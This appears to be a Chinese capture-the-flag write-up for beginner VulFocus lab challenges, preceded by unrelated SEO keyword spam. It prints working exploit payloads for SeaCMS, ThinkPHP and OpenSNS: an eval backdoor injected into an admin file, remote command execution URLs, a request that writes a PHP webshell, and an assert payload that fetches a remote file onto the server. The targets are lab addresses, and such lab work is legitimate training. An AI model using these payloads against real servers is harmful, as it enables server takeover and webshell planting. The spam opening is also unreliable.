网站开发实训小结,哈尔滨互联网广告公司,东台建设网站,小程序开发和app开发差别漏洞指北-VulFocus靶场专栏-初级 初级001 #x1f338;海洋CMS代码执行#xff08;CNVD-2020-22721#x1f338;step1#xff1a;进入后台页面 账号密码#xff1a;admin amdinstep2#xff1a;点击系统#xff0c;点击后台IP安全设置,关闭step3 启动burpsuite#xff… 漏洞指北-VulFocus靶场专栏-初级 初级001 海洋CMS代码执行CNVD-2020-22721step1进入后台页面 账号密码admin amdinstep2点击系统点击后台IP安全设置,关闭step3 启动burpsuite启动代理抓请求包step4 http请求包中加入后门等200 的响应状态码step5 200OK 进入admin页面,寻找flag结束 初级002 thinkphp 代码执行 (CNVD-2018-24942)方法1构造payload远程代码执行输入ls /tmp指令方法2: 构造一句话木马result探囊取物 初级003 phpinfo-inclusion 文件写入step1 去指定地址的phpinfo.php文件夹下面step2 获取信息后 寻找flag 初级004 opensns 命令执行 CNVD-2021-34590step1 构造网页的payload即可方案2 hackbar 初级001 海洋CMS代码执行CNVD-2020-22721
原因 命令执行漏洞在w1aqhp/admin_ip.php下第五行使用set参数对用户输入没有进行任何处理直接写入文件。攻击者可利用该漏洞执行恶意代码获取服务器权限。 后台路径/manager 后台密码admin:admin 解决方案
step1进入后台页面 账号密码admin amdin http://10.11.12.28:17302/manager/login.php step2点击系统点击后台IP安全设置,关闭 拼接指令cmd ls /tmp cmd就是执行shell的命令 常见的flag一般都是在/tmp页面下 注意‘ ’的符号是%20 后面玩捉迷藏有时候会用到这个点。 step3 启动burpsuite启动代理抓请求包 step4 http请求包中加入后门等200 的响应状态码 v0ip11111111111;phpinfo();eval($_POST[cmd]);// step5 200OK 进入admin页面,寻找flag结束 http://10.11.12.28:17302/manager/admin_ip.php 初级002 thinkphp 代码执行 (CNVD-2018-24942)
原因 由于框架对控制器名未能进行足够的检测攻击者利用该漏洞对目标网站进行远程命令执行攻击。
解决方案
方法1构造payload远程代码执行输入ls /tmp指令 http://10.11.12.28:24050/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]ls%20/tmp 方法2: 构造一句话木马 http://10.11.12.28:24050/?sindex/\think\template\driver\file/writecacheFileshell.phpcontent%3C?php%20eval($_POST[pass])?%3E result探囊取物 初级003 phpinfo-inclusion 文件写入
原因 phpinfo()常用于在系统上检查配置设置和预定义变量。 通过写入脚本文件然后读取从而getshell
step1 去指定地址的phpinfo.php文件夹下面 http://10.11.12.28:20756/phpinfo.php step2 获取信息后 寻找flag 初级004 opensns 命令执行 CNVD-2021-34590
原因 OpenSNS存在命令执行漏洞攻击者可利用该漏洞获取服务器控制权限
step1 构造网页的payload即可 http://10.11.12.28:61968/index.php?sweibo/Share/shareBoxqueryappCommon%26modelSchedule%26methodrunSchedule%26id[status]1%26id[method]Schedule-%3E_validationFieldItem%26id[4]function%26id[0]cmd%26id[1]assert%26id[args]cmdphpinfo() 方案2 hackbar http://10.11.12.28:61968/index.php?sweibo/Share/shareBoxqueryappCommon%26modelSchedule%26methodrunSchedule%26id[status]1%26id[method]Schedule-%3E_validationFieldItem%26id[4]function%26id[0]cmd%26id[1]assert%26id[args]cmdcopy(%27http://xxx/a.txt%27,%27a.php%27)